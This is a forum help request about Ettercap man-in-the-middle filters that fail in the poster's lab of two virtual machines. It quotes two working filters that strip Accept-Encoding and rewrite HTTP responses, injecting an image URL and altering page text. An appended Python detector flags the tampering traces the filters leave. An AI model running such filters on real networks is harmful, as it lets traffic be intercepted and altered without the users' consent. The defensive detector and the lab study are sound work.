Hi,
I have been poring over the Internet, and especially this forum, for the last few days to try to find an answer to my problem.
I see that in the past many people have had issues with getting Ettercap filters to work, and I guess I am now one of them.
I just wanted to try the IronGeek Image Replacement script in my own Lab, which can be found here: http://www.irongeek.com/i.php?page=s...ettercapfilter
I'm running two VMs:
1. BT5 R3 Gnome 64 Bit (though I have tried this now on BT4 R2, BT5 R2)
2. Windows XP SP2
The filter from the website is this one below:
Code:
# client -> server: neuter Accept-Encoding so the server sends an uncompressed body
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        # note: replacement string is same length as original string
        msg("zapped Accept-Encoding!\n");
    }
}
# server -> client: rewrite image tags in the uncompressed HTML
if (ip.proto == TCP && tcp.src == 80) {
    replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
    replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
    msg("Filter Ran.\n");
}
With this one, no images are replaced; however, sometimes at the bottom of the page a line that might have a JavaScript src tag will be changed to the image link.
Wireshark shows that the TCP packets are coming in out of order and calling for retransmission. I can see inside that they are getting changed, but then it looks like a retransmission occurs and they are getting replaced, maybe?
I switched the script up some, and replaced it with one I found on this website to just change the Title Tag:
Code:
# client -> server: same Accept-Encoding swap as the first filter
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        # note: replacement string is same length as original string
        msg("zapped Accept-Encoding!\n");
    }
}
# server -> client: swap two test strings in the response body
if (ip.proto == TCP && tcp.src == 80) {
    msg("in Second IF\n");
    if (search(DECODED.data, "Hello")) {
        replace("Hello", "12345");
        msg("run\n");
    }
    if (search(DATA.data, "Google")) {
        replace("Google", "GOOGLE HACKED");
        msg("run2\n");
    }
}
This one is even more interesting, as if a page has those keywords in it, I'll get a "page cannot be displayed". On both I'm getting the msg's that the script is getting triggered... /sigh
Any ideas?
I've uncommented the lines in etter.conf for the iptables. I'm also only running ettercap with this, not sslstrip etc.
Thanks for any help you can provide.
-DV
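Added example, not code from the post or from IronGeek: a small Python detector for the artifacts the two filters above leave on the wire, the kind of check a defender can run over captured HTTP to spot this in-flight tampering. It assumes each request or response is available as one raw bytes message; the sample messages are constructed, not captures from the poster's lab.

```python
INJECTED_IMG = b'img src="http://www.irongeek.com/images/jollypwn.png"'

def split_http(message: bytes):
    """Split one raw HTTP message into (start line, {lower-cased name: value}, body)."""
    head, sep, body = message.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no header/body separator in message")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def find_tampering(message: bytes):
    """Return the list of filter artifacts found in one request or response."""
    start, headers, body = split_http(message)
    findings = []
    # first rule: Accept-Encoding renamed in place; no real client sends this header
    if b"accept-rubbish!" in headers:
        findings.append("request: Accept-Encoding mangled to Accept-Rubbish!")
    # second rule grows the body but never touches Content-Length, so the
    # header the client uses to delimit the body goes stale
    if start.startswith(b"HTTP/") and headers.get(b"content-length", b"").isdigit():
        declared = int(headers[b"content-length"])
        if declared != len(body):
            findings.append(f"response: Content-Length {declared} != body {len(body)}")
    if INJECTED_IMG in body:
        findings.append("response: injected jollypwn.png img tag")
    return findings

# Constructed sample messages (not captures from the poster's lab)
CLEAN_REQUEST = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
                 b"Accept-Encoding: gzip, deflate\r\n\r\n")
TAMPERED_REQUEST = CLEAN_REQUEST.replace(b"Accept-Encoding", b"Accept-Rubbish!")
ORIGINAL_BODY = b'<html><body><img src="/logo.png"></body></html>'
RESPONSE_HEAD = b"HTTP/1.1 200 OK\r\nContent-Length: %d\r\n\r\n" % len(ORIGINAL_BODY)
CLEAN_RESPONSE = RESPONSE_HEAD + ORIGINAL_BODY
# the same response after the thread's replace("img src=", ...) rule fires
TAMPERED_BODY = ORIGINAL_BODY.replace(b"img src=", INJECTED_IMG + b" ")
TAMPERED_RESPONSE = RESPONSE_HEAD + TAMPERED_BODY

if __name__ == "__main__":
    for label, msg in [("clean request", CLEAN_REQUEST), ("tampered request", TAMPERED_REQUEST),
                       ("clean response", CLEAN_RESPONSE), ("tampered response", TAMPERED_RESPONSE)]:
        print(label, find_tampering(msg) or ["clean"])
```

The Content-Length check also shows why length-changing replace() rules are fragile: the body is rewritten but the header the client uses to delimit it is not, so the client sees a truncated or malformed page.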